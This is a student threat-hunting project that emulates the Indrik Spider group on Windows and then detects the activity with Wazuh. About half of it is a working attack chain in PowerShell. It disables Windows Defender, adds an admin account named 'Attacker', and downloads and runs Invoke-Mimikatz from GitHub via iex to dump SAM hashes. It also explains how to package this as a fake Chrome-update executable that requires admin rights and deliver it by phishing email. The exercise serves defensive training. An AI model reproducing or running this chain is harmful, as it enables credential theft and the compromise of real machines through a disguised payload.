Max Gallagher & Maxwell Berry Final Project: Threat Hunting

Deliverable 1: Introduce your threat actor and the specific TTPs you are looking for. Who are they and what is their attribution and motivation. Provide an overview of a specific incident attributed to this attacker.

Threat Actor: Indrik Spider

TTPS:

• User Execution: Malicious File

• Create Admin Account

• Service Stop

• Credential Dumping

Background Info

Indrik Spider is a Russian cybercrime group that was first uncovered in 2014, they were most well-known for operating the Dridex Malware which is a now a well known trojan and the BitPaymer ransomware. They used Dridex to steal millions of dollars from banks and other organizations up until 2017 when the switched to using BitPaymer. Indrik Spider as a group was motivated purely by financial gain but the generally only targeted organizations instead of specific individuals.

A specific incident that has been attributed to the Indrik Spider group is a ransomware attack on Arazona Beverages in 2019 that locked them out and completely wiped a large chunk of windows computers and servers. In this attack they used Dridex which was delivered through an email attachment which allowed them to spread the ransomware throughout Arazona's network compromising a large variety of different windows devices. This attack prevent Arazona from doing business digitally for multiple days supposedly according to an insider "losing millions of dollars a day in sales". It took Arizona over 2 weeks to rebuild their network after this attack.

Source: https://techcrunch.com/2019/04/02/arizona-beverages-ransomware/

Deliverable 2: Create the conditions that generate the telemetry that are associated with at least three of your TTPs. This could be logs, active processes, strange use of powershell, files, callouts to specific IPs or DNS ,hashes etc…

-We decided that the best way to perform the TTPs that we picked out from Indrik Spider was through the use of powershell scripting, and then combining the scripts for each step into one large script which would become an executable file that would be hidden as a different program.

-originally we planned on doing it through Empire which is how they usually went about using PowerShell scripts but we learned that it only was compatible with windows 7

Turning off Windows Defender

-Before we could really do anything with our scripting we wanted to make sure that there would not be anything in windows stopping us so we started by turning of windows defender.

-This was done by putting this at the top of our PowerShell script/running it before any other commands were run

Set-MpPreference -DisableRealtimeMonitoring $true

Script for Creating an Admin User

#The values used in $Username, $Password, $Fullname, and $Description are all able to be changed to whatever you need them to be and realistically full name and description are not really necessary
 
$Username = "Attacker" 
$Password = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
$FullName = "Hacker Man"
$Description = "I AM SCARY BOOOOOO"
$User = New-LocalUser -Name $Username -Password $Password -FullName $FullName -Description $Description
Add-LocalGroupMember -Group "Administrators" -Member $Username

Script for killing the Google Chrome Process (This can be replaced with process of choice, we just used Chrome because that is what the executable is being disguised as)

# Get the process ID of Google Chrome
$chromeProcess = Get-Process -Name chrome
# Stop the process
Stop-Process -Id $chromeProcess.Id

Script that dumps hashed user credentials to a file that is accessible by the user we just made

-There were lots of ways for us to go about finding the hashed credentials but we ended up deciding to use Mimikatz since it is what Indrik Spider most commonly used and was also accessible to us

#Uses Mimikatz to find the systems credentials and then it exports it to a file that that is public to all users (just in case the user you make has a hard time getting admin)
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command token::elevate | out-null
Invoke-Mimikatz -Command lsadump::sam | Out-File -FilePath C:\Users\Public\Documents\file.txt

Final Culminated Script:

#Disables Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true

#Creates New Admin User
$Username = "Attacker"
$Password = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
$FullName = "Hacker Man"
$Description = "I AM SCARY BOOOOOO"
$User = New-LocalUser -Name $Username -Password $Password -FullName $FullName -Description $Description
Add-LocalGroupMember -Group "Administrators" -Member $Username

# Stops the chrome process
# Get the process ID of Google Chrome
$chromeProcess = Get-Process -Name chrome
# Stop the process
Stop-Process -Id $chromeProcess.Id

#Uses Mimikatz to find the systems credentials and then it exports it to a file that that is public to all users (just in case the user you make has a hard time getting admin)
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command token::elevate | out-null
Invoke-Mimikatz -Command lsadump::sam | Out-File -FilePath C:\Users\Public\Documents\file.txt

Converting this all into an Executable and Disguising it as a Google Chrome Update

• We used a program that we found called "PS2EXE" (Download Link: https://github.com/MScholtes/PS2EXE/blob/master/Module/Win-PS2EXE.exe)

• When you open it you are confronted with a GUI with 3 main options to fill out:

• For the source file you want to insert your powershell script in the format of a .ps1 file

• For the Target file you are going to put in the file path + name of the file you want the exe to be saved to, make sure that while naming your file you add .exe to the end or else it won't allow you to make the conversion

• Lastly for the Icon file section you should put what ever you want the icon of the file to be, in the case of this project where we wanted to replicate a chrome update we found an image of the google chrome icon and used that.

• An additional setting that is important to check off is "Require administrator rights at runtime" as our goal with this executable is to trick the victim into running it as administrator.

-Here is an example of what it should look like once filled out:

-We also decided that the best way to simulate the attacker sending the file was through a fake phishing email (gmail actually detected it as a potential phishing attack which was a relief seeing how obvious we made it.)

Deliverable 3: Use your chosen detection tools to identify the host, process, file or activity that flags activity by your chosen threat actor. Dashboards in wazuh or your selected SIEM are encouraged, alternatively, canned queries with your conditions are fine too.

Wazuh Configuration

-Once you have successfully installed Wazuh onto your system you want to use the Username and Password that it provides to login to your Wazuh portal. Once inside you will see a photo similar to the one below.

-Once you have successfully reached the Wazuh portal, you must navigate to the agent's portion. You can do this by clicking on the agent number under the total agent's label on the modules page or you can do this by clicking the dropdown in the top left corner and clicking on agents.

-After clicking agents you should see a photo similar to the one below.

-After you have gotten to this page you should see a label with a plus that says “Deploy new agent” click on this. You should see a page similar to the one below.

-From here you need to plug in data for your new agent. In our case we are using a windows machine so we would need to put in a Windows operating system and put in the Wazuh server address which for us was 172.16.200.10. Then we needed to assign this new computer to the Windows group.

-For the 4rth step, we need to copy the command below and put it onto a powershell shell to install the Wazuh agent on the computer. The command looks similar to the one below.

-Once this has run on your computer you need to restart the Agent on the computer. You can do this by running the following command in the same Powershell shell.

-Now that you have successfully installed the Wazuh agent, make sure that it will catch everything that you want to look for when it comes to malware or other suspicious activity. -You can navigate to the MITRE ATT&CK threat detection tab under modules.

-Once here you will need to navigate to the frameworks tab to find a variety of attacks, techniques, and tactics that Wazuh will log/monitor for you. It should look similar to the screenshot below.

-To check to see if anything has been logged or flagged on your system you need to navigate to Modules then to your Agent then to Security Events then finally you need to click on the events tab and you should see a list of events that have taken place on your system.

-This is what a proper Wazuh log for our threat simulation will look like:

Deliverable 4: Your demonstration should briefly cover the documentation you've written that documents any client modifications (example, enabling PowerShell logging), agent deployment and configuration, server monitoring configuration.

Video Link: https://drive.google.com/file/d/1I76K7yj7tVUbY7REjNcFBkDpuaj3bsPt/view?usp=sharing

Video of executable running, we forgot to include it in main video: https://drive.google.com/file/d/1s6U84ObHfOqjoDMDiIs_gH20czXR0dKC/view

**Deliverable 5: Roles and Responsibilities, Lastly, If you were on a team, discuss who did what and any difficulties encountered in the project.(1 point)

Max:

-Helped find the threat actor and decide on the TTPs (Deliv 1)

-Researched into Indrik Spider and wrote the summary + thereat attack that they did (Deliv 1)

-Recreating the Actor Activity, writing the script and documenting the process (Deliv 2)

Maxwell:

-Helped find the threat actor and decide on the TTPs (Deliv 1)

-Working with and documenting Wazuh and figuring out how to detect the threat attack (Deliv 3)

Difficulties:

• We planned on working with Empire as that is what Indrik Spider used when working with powershell but we then learned it did not work with windows 10

• Microsoft has tried really hard to stop Mimikatz from being used so we had to jump through a few hoops to make it work